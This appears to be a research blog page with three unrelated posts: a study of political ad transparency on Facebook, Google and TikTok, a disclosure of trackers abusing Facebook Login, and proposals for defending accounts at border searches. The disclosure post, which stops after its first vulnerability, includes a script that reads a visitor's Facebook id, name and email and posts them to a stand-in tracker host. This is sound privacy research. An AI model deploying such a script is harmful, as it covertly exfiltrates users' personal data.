September 26, 2022

New Study Analyzing Political Advertising on Facebook, Google, and TikTok

By Orestis Papakyriakopoulos, Christelle Tessono, Arvind Narayanan, Mihir Kshirsagar

With the 2022 midterm elections in the United States fast approaching, political campaigns are poised to spend heavily on digital advertising to influence prospective voters. Online platforms such as Facebook, Google, and TikTok will play an important role in distributing that content. But our new study, "How Algorithms Shape the Distribution of Political Advertising: Case Studies of Facebook, Google, and TikTok," which appeared at the Artificial Intelligence, Ethics, and Society (AIES) conference in August, shows that the platforms' tools for voluntary disclosures about political ads do not provide the transparency the public needs. More details can be found on our website: campaigndisclosures.princeton.edu.

Our paper presents the first large-scale analysis of public data from the 2020 U.S. presidential election cycle to critically evaluate how online platforms affect the distribution of political advertisements. We analyzed a dataset of over 800,000 ads about the 2020 presidential election that ran in the two months before the election, obtained from the ad libraries that Facebook and Google created to offer more transparency about political ads. We also collected and analyzed 2.5 million TikTok videos from the same period. The platforms created these ad libraries in part to stave off potential regulation such as the Honest Ads Act, which sought to impose greater transparency requirements on platforms carrying political ads. But our study shows that the ad libraries fall woefully short of their own objectives of disclosing who pays for ads and who sees them, as well as the broader objective of bringing transparency to the platforms' role in shaping the distribution of political advertising.

We developed a three-part evaluative framework to assess the platform disclosures: 

1. Do the disclosures meet the platforms’ self-described objective of making political advertisers accountable?

2. How do the platforms’ disclosures compare against what the law requires for radio and television broadcasters?

3. Do the platforms disclose all that they know about the ad targeting criteria, the audience for the ads, and how their algorithms distribute or moderate content?

Our analysis shows that the ad libraries meet none of these objectives. First, the ad libraries disclose only partial information about the audience characteristics and targeting parameters of political ads, which does not allow us to understand how political advertisers reached prospective voters. For example, we compared ads in the ad libraries that were shown to different audiences with dummy ads that we created on the platforms with the same targeting parameters (Figure 1). In many cases, we measured a significant difference in the calculated cost per impression between the two types of ads, which the available data could not explain.

  • Figure 1. We plot the cost per impression of ads in the ad libraries that were (1) targeted to all genders and ages on Google, (2) targeted to females aged 25-34 on YouTube, (3) seen by all genders and ages in the U.S. on Facebook, and (4) seen only by females of all ages located in California on Facebook. For Facebook, lower and upper bounds are provided for impressions; for Google, lower and upper bounds are provided for both cost and impressions, given the extensive "bucketing" of the parameters performed by the ad libraries when reporting them. Boxes denote these bounds, and points represent the median value of each box. We compare the cost per impression of library ads with the cost per impression of a set of dummy ads we placed on the platforms with the exact same targeting parameters and audience characteristics. Black lines represent the upper and lower bounds of an ad's cost per impression as extracted from the dummy ads. We label a placement "plausible targeting" when the ad's cost per impression overlaps with the range we calculated, indicating that the ad library plausibly provides all relevant targeting parameters and audience characteristics for the ad. Conversely, a placement labeled "unexplainable targeting" has a cost per impression outside the calculated bounds, meaning the platform may not disclose full information about the distribution of the ad.
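To make the labeling step concrete, here is a minimal sketch of the interval comparison (our own illustration, not the paper's published code). It assumes each library ad reports bucketed spend and impression ranges, and compares the implied cost-per-impression interval against the interval observed for dummy ads with identical targeting; all field and function names are invented for this example.

```typescript
// Sketch of the "plausible vs. unexplainable targeting" check, assuming
// bucketed spend/impression ranges as reported by the ad libraries.

interface AdRecord {
  id: string;
  spendLow: number;   // lower bound of the reported spend bucket (USD)
  spendHigh: number;  // upper bound of the reported spend bucket (USD)
  imprLow: number;    // lower bound of the reported impressions bucket
  imprHigh: number;   // upper bound of the reported impressions bucket
}

// Cost-per-impression interval implied by the bucketed report.
function cpiBounds(ad: AdRecord): [number, number] {
  return [ad.spendLow / ad.imprHigh, ad.spendHigh / ad.imprLow];
}

// Label a placement by comparing its CPI interval with the interval
// observed for dummy ads placed with identical targeting.
function labelPlacement(ad: AdRecord, dummyLow: number, dummyHigh: number): string {
  const [low, high] = cpiBounds(ad);
  const overlaps = low <= dummyHigh && high >= dummyLow;
  return overlaps ? "plausible targeting" : "unexplainable targeting";
}

// Example: an ad reported with $100-$199 spend and 10k-15k impressions.
const example: AdRecord = { id: "ad-1", spendLow: 100, spendHigh: 199, imprLow: 10000, imprHigh: 15000 };
console.log(labelPlacement(example, 0.004, 0.009)); // "plausible targeting"
```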

Second, broadcasters are required to offer advertising space to political advertisers at the same price they charge commercial advertisers. But we find that the platforms charged campaigns different prices for distributing ads. For example, on Facebook the Trump campaign paid more per impression, receiving on average about 18 impressions per dollar, than the Biden campaign, which received about 27 impressions per dollar (roughly $56 versus $37 per thousand impressions). On Google, the pattern was reversed: the Biden campaign paid more per impression than the Trump campaign. While we attempted to control for factors that might account for different prices for different audiences, the data does not allow us to probe the precise reason for the differential pricing.

Third, the platforms do not disclose the detailed audience characteristics that they make available to advertisers, nor do they explain how their algorithms distribute or moderate ads. For example, we find that campaigns placed ads on Facebook that were ostensibly not targeted by age, yet the ads were not distributed uniformly across age groups. We also find that platforms applied their ad moderation policies inconsistently: some instances of a moderated ad were removed while others were not, without any explanation for the decision to remove an ad (Figure 2).

  • Figure 2. Comparison of different instances of moderated ads across platforms. Light blue bars show how many instances of a single ad were moderated, and maroon bars show how many instances of the same ad were not. The results suggest inconsistent moderation of content across platforms, with some instances of the same ad being removed and others not.
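To illustrate how such inconsistency can be quantified, here is a small sketch that groups instances of the same ad creative and flags creatives where some instances were removed and others were not. The record layout (creativeId, wasModerated) is our assumption for illustration, not the paper's schema.

```typescript
// Count moderated vs. unmoderated instances of each unique ad creative.

interface AdInstance {
  creativeId: string;   // identifies copies of the same ad creative
  wasModerated: boolean;
}

function moderationCounts(instances: AdInstance[]): Map<string, { moderated: number; kept: number }> {
  const counts = new Map<string, { moderated: number; kept: number }>();
  for (const inst of instances) {
    const entry = counts.get(inst.creativeId) ?? { moderated: 0, kept: 0 };
    if (inst.wasModerated) entry.moderated += 1;
    else entry.kept += 1;
    counts.set(inst.creativeId, entry);
  }
  return counts;
}

// A creative is inconsistently moderated if some, but not all, of its
// instances were removed.
function inconsistentlyModerated(instances: AdInstance[]): string[] {
  return [...moderationCounts(instances)]
    .filter(([, c]) => c.moderated > 0 && c.kept > 0)
    .map(([id]) => id);
}
```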

Finally, we observed new forms of political advertising that the ad libraries do not capture at all. Specifically, campaigns appear to have used influencers to promote their messages without adequate disclosure. For example, on TikTok we document how political influencers, who were often linked to PACs, generated billions of impressions with their political content. This type of campaigning remains unregulated, and little is known about these practices or about the relationships between influencers and political campaigns.

In short, the platforms' self-regulatory disclosures are inadequate, and we need more comprehensive disclosures from platforms to understand their role in the political process. Our key recommendations include:

– Requiring that each political entity registered with the FEC use a single, universal identifier for campaign spending across platforms to allow the public to track their activity.

– Developing a cross-platform data repository, hosted and maintained by a government or independent entity, that collects political ads, their targeting criteria, and the audience characteristics that received them. 

– Requiring platforms to disclose information that will allow the public to understand how the algorithms distribute content and how platforms price the distribution of political ads. 

– Developing a comprehensive definition of political advertising that includes influencers and other forms of paid promotional activity.

No boundaries for Facebook data: third-party trackers abuse Facebook Login

by Steven Englehardt [0], Gunes Acar, and Arvind Narayanan

So far in the No boundaries series, we’ve uncovered how web trackers exfiltrate identifying information from web pages, browser password managers, and form inputs.

Today we report yet another type of surreptitious data collection by third-party scripts that we discovered: the exfiltration of personal identifiers from websites through “login with Facebook” and other such social login APIs. Specifically, we found two types of vulnerabilities [1]:

  • seven third parties abuse websites’ access to Facebook user data
  • one third party uses its own Facebook “application” to track users around the web.

 

Vulnerability 1: Third parties piggyback on Facebook access granted to websites

[Figure: diagram of a third-party script accessing the Facebook API]

When a user clicks "Login with Facebook", they will be prompted to allow the website they're visiting to access some of their Facebook profile information [2]. Even after Facebook's recent moves to lock down the feature, websites can request the user's email address and "public profile" (name, age range, gender, locale, and profile photo) without triggering a manual review by Facebook. Once the user allows access, any third-party JavaScript embedded in the page, such as tracker.com in the figure above, can also retrieve the user's Facebook information as if it were the first party [3].
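To make the attack concrete, here is a minimal sketch of what such an embedded third-party script could do. It assumes the first party has already loaded and initialized the Facebook JS SDK on the page; "tracker.example" stands in for the tracker's own server.

```typescript
// Sketch: a third-party script piggybacking on the first party's
// Facebook SDK session.

declare const FB: any; // global injected by the Facebook JS SDK

FB.getLoginStatus((response: any) => {
  if (response.status === "connected") {
    // The SDK answers the embedded script exactly as it would answer
    // the first party, returning the fields the user granted the site.
    FB.api("/me", { fields: "id,name,email" }, (user: any) => {
      // Exfiltrate the identifiers to the tracker's own server.
      fetch("https://tracker.example/collect", {
        method: "POST",
        body: JSON.stringify(user),
      });
    });
  }
});
```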


Engineering around social media border searches

The latest news is that the U.S. Department of Homeland Security is considering requiring prospective visitors to disclose their "online presence" when passing through a border checkpoint. That means immigration officials would require users to divulge their passwords to Facebook and other such services, which an agent might then inspect on the spot, at the border crossing. This raises a variety of concerns, from the chilling effect on freedom of speech to the possibility that it constitutes an unreasonable search or seizure, never mind whether an airport border agent has the necessary training to make such judgments, much less the time to do so while hundreds of people wait in line.

Rather than conduct a serious legal analysis, however, I want to talk about technical countermeasures. What might Facebook or other such services do to help defend their users as they pass a border crossing?

Fake accounts. It’s certainly feasible today to create multiple accounts for yourself, giving up the password to a fake account rather than your real account. Most users would find this unnecessarily cumbersome, and the last thing Facebook or anybody else wants is to have a bunch of fake accounts running around. It’s already a concern when somebody tries to borrow a real person’s identity to create a fake account and “friend” their actual friends.

Duress passwords. Years ago, my home alarm system supported two separate PINs. One would disable the alarm as normal. The other would sound a silent alarm, summoning the police immediately while making it seem like I had disabled the alarm. Let's say Facebook supported something similar: you enter the duress password, and Facebook locks out your account or switches to your fake account, as above.
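As a concreteness check, here is a minimal sketch of how such duress routing might work, assuming the service stores separate hashes for the real and duress passwords. All names are hypothetical; a deployed version would also need rate limiting and careful handling of the switch to a decoy profile.

```typescript
// Sketch of duress-password routing with two stored hashes per account.

import { scryptSync, timingSafeEqual } from "node:crypto";

type LoginOutcome = "normal" | "duress";

interface Account {
  salt: Buffer;
  normalHash: Buffer; // scrypt hash of the real password
  duressHash: Buffer; // scrypt hash of the duress password
}

function checkLogin(account: Account, password: string): LoginOutcome | null {
  const hash = scryptSync(password, account.salt, 64);
  if (timingSafeEqual(hash, account.normalHash)) return "normal";
  if (timingSafeEqual(hash, account.duressHash)) return "duress"; // lock out, or show the decoy account
  return null; // failed login
}
```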

Temporary lockouts. If you know you're about to go through a border crossing, you could use a duress password, as above, or you could arrange an account lockout in advance. You might, for example, designate ten trusted friends, any five of whom must declare that the lockout is over. Absent those declarations, your account would remain locked, and there would be no way for you to be coerced into giving access to your own account.
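Here is a minimal sketch of that k-of-n release logic, under the assumption that the platform can authenticate each friend's declaration; the types and names are invented for illustration.

```typescript
// Sketch of a k-of-n trusted-friend release for a travel lockout.

interface Lockout {
  trustees: Set<string>;  // e.g., ten designated friends
  releasesNeeded: number; // e.g., five
  releasedBy: Set<string>;
}

// Record one friend's declaration; returns true once the account
// may be unlocked.
function recordRelease(lockout: Lockout, friendId: string): boolean {
  if (lockout.trustees.has(friendId)) {
    lockout.releasedBy.add(friendId);
  }
  // The account unlocks only once enough distinct trustees agree.
  return lockout.releasedBy.size >= lockout.releasesNeeded;
}
```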

Temporary sanitization. Absent any action from Facebook, the best advice today for somebody about to go through a border crossing is to sanitize their account beforehand. That means second-guessing what border agents are looking for and deleting it in advance. Facebook might assist this by providing search features that let users temporarily drop friends, temporarily remove comments or posts containing certain keywords, and so on. As with temporary lockouts, temporary sanitization would need a restoration process that could be delegated to trusted friends. Once you give the all-clear, everything comes back again.
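One way to picture the reversible half of this idea: a sketch that hides (rather than deletes) matching posts and records what to restore later. The data model is invented for illustration.

```typescript
// Sketch of temporary, reversible sanitization: hide posts matching
// traveler-chosen keywords, keeping their IDs for later restoration.

interface Post { id: string; text: string; hidden: boolean }

function sanitize(posts: Post[], keywords: string[]): string[] {
  const vault: string[] = [];
  for (const post of posts) {
    if (keywords.some(k => post.text.toLowerCase().includes(k.toLowerCase()))) {
      post.hidden = true;  // hidden, not deleted
      vault.push(post.id); // remember what to restore
    }
  }
  return vault; // after the all-clear, un-hide every post in the vault
}
```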

User defense in bulk. Every time a user going through a border crossing uses a duress password, that's an unambiguous signal to Facebook. Even absent such signals, Facebook would observe highly unusual login behavior coming from those specific browsers and IP addresses. Facebook could simply deny access to its services from government IP address blocks. While it's entirely possible for the government to circumvent this, whether using Tor or anything else, there's no reason Facebook needs to be complicit in the process.
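The simplest version of that block is a CIDR membership test against a list of known ranges. Here is a sketch; the example range below is a made-up placeholder, not a real government block.

```typescript
// Sketch: flag logins from a listed IPv4 block via a CIDR test.

function ipToInt(ip: string): number {
  return ip.split(".").reduce((acc, octet) => (acc << 8) | parseInt(octet, 10), 0) >>> 0;
}

function inCidr(ip: string, cidr: string): boolean {
  const [base, bitsStr] = cidr.split("/");
  const bits = parseInt(bitsStr, 10);
  const mask = bits === 0 ? 0 : (~0 << (32 - bits)) >>> 0;
  return ((ipToInt(ip) & mask) >>> 0) === ((ipToInt(base) & mask) >>> 0);
}

// Example with a placeholder block list (TEST-NET-2 range):
const blockedRanges = ["198.51.100.0/24"];
console.log(blockedRanges.some(b => inCidr("198.51.100.7", b))); // true
```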

So is there a reasonable alternative?

While it’s technically feasible for the government to require that Facebook give it full “backdoor” access to each and every account so it can render threat judgments in advance, this would constitute the most unreasonable search and seizure in the history of that phrase. Furthermore, if and when it became common knowledge that such unreasonable seizures were commonplace, that would be the end of the company. Facebook users have an expectation of privacy and will switch to other services if Facebook cannot protect them.

Wouldn’t it be nice if there were some less invasive way to support the government’s desire for “extreme vetting”? Can we protect ordinary users’ privacy while still enabling the government to intercept people who intend harm to our country? We certainly must assume that an actual bona fide terrorist will have no trouble creating a completely clean online persona to use while crossing a border, complete with invented wholesome friends whose healthy children share silly videos of cute kittens. While we don’t know much about existing vetting strategies for distinguishing tourists from terrorists, we have to assume the process involves the accumulation of signals, human intelligence, and other painstaking efforts by professional investigators to protect our country from harm. It’s entirely possible that they’re already doing a good job.